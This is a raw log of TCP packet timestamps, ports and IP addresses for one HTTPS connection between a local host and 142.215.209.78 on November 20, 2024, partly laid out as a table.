                                                                                                          Nov 20, 2024 17:18:24.728794098 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.728864908 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.728873968 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.730652094 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.730720997 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.730730057 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.734164953 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.734266996 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.734275103 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.736885071 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.736984968 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.736994028 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.781377077 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.895112991 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.895148039 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.895220995 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.895292997 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.895335913 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.898159027 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.898222923 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.898230076 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.898257971 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.898283958 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.900984049 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.901078939 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.901093960 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.905033112 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.905138969 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.905153990 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.907399893 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.907473087 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.907495975 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.911011934 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.911082983 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.911098003 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.914033890 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.914114952 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.914132118 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.916928053 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.917021990 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.917037010 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.920193911 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.920269966 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.920285940 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.922857046 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.922972918 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.922991037 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.926187992 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.926285982 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.926299095 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.928951025 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.929027081 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.929042101 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.931783915 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.931874037 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:24.931890965 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:24.935379028 CET44349713142.215.209.78192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 20, 2024 17:18:24.935470104 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:24.935486078 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:24.938148022 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:24.938225031 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:24.938239098 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:24.940864086 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:24.940957069 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:24.940964937 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:24.984530926 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.094369888 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.094393969 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.094470978 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.094513893 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.097420931 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.097467899 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.097498894 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.097531080 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.097568989 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.099827051 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.099899054 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.099915028 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.103462934 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.103550911 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.103565931 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.106717110 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.106790066 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.106806993 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.109097004 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.109179020 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.109193087 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.112564087 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.112637997 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.112652063 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.115406036 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.115483046 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.115497112 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.119178057 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.119257927 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.119272947 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.121766090 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.121850014 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.121864080 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.124941111 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.125021935 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.125036001 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.127846003 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.127933025 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.127947092 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.130458117 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.130538940 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.130557060 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.134191036 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.134262085 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.134270906 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.137779951 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.137850046 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.137857914 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.187634945 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.304627895 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.304651976 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.304753065 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.304783106 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.307041883 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.307061911 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.307113886 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.307149887 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.307182074 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.309902906 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.309942007 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.309982061 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.309998035 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.310026884 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.312681913 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.312758923 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.312774897 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.316155910 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.316240072 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.316272974 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.322578907 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.322664976 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.322679996 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.324893951 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.324980021 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.324994087 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.328305006 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.328373909 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.328389883 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.331495047 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.331581116 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.331603050 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.334018946 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.334093094 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.334106922 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.337271929 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.337347984 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.337362051 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.340670109 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.340734959 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.340743065 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.343245029 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.343336105 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.343343973 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.346626043 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.346698999 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.346708059 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.349776030 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.349848986 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.349857092 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.352852106 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.352910995 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.352917910 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.406399965 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.508889914 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.508914948 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.508996010 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.509037018 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.511548996 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.511569023 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.511612892 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.511631012 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.511661053 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.514401913 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.514444113 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.514478922 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.514503002 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.514528036 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.517237902 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.517316103 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.517330885 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.520621061 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.520697117 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.520713091 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.521106958 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.521176100 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.521189928 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.523905039 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.523983955 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.523998976 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.526585102 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.526675940 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.526690006 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.529608011 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.529685020 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.529700041 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.532968998 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.533046007 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.533058882 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.535458088 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.535538912 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.535552025 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.538955927 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.539030075 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.539057970 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.542049885 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.542128086 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.542139053 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.545394897 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.545459986 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.545468092 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.548085928 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.548156977 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.548165083 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.550864935 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.550930977 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.550940990 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.593938112 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.707400084 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.707433939 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.707542896 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.707583904 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.707600117 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.709666967 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.709712982 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.709734917 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.709753036 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.709775925 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.712944031 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.713023901 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.713038921 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.716047049 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.716140985 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.716155052 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.718839884 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.718916893 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.718935013 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.721779108 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.721872091 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.721885920 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.725234985 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.725320101 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.725333929 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.728288889 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.728355885 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.728368998 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.730788946 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.730922937 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.730942965 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.734412909 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.734539032 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.734570026 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.737574100 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.737648964 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.737663031 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.740266085 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.740345001 CET  49713        443        192.168.2.7      142.215.209.78
Nov 20, 2024 17:18:25.740359068 CET  443          49713      142.215.209.78   192.168.2.7
Nov 20, 2024 17:18:25.743092060 CET  443          49713      142.215.209.78   192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.743165970 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.743174076 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.746733904 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.746799946 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.746809006 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.749646902 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.749744892 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.749752998 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.752337933 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.752412081 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.752419949 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.796998024 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.908864021 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.908884048 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.908999920 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.909049034 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.911056995 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.911096096 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.911129951 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.911163092 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.911190987 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.914421082 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.914511919 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.914532900 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.917342901 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.917434931 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.917448997 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.920509100 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.920607090 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.920633078 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.923719883 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.923815012 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.923839092 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.926481009 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.926558971 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.926575899 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.929626942 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.929744959 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.929763079 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.932845116 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.932935953 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.932965040 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.935663939 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.935753107 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.935770035 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.938770056 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.938844919 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.938854933 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.941771030 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.941833973 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.941844940 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.945209026 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.945272923 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.945283890 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.947935104 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.948015928 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.948025942 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.950762033 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.950834036 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.950848103 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.954377890 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:25.954461098 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:25.954473972 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.000129938 CET49713443192.168.2.7142.215.209.78
                                                                                                          Nov 20, 2024 17:18:26.110198021 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.110209942 CET44349713142.215.209.78192.168.2.7
                                                                                                          Nov 20, 2024 17:18:26.110276937 CET49713443192.168.2.7142.215.209.78
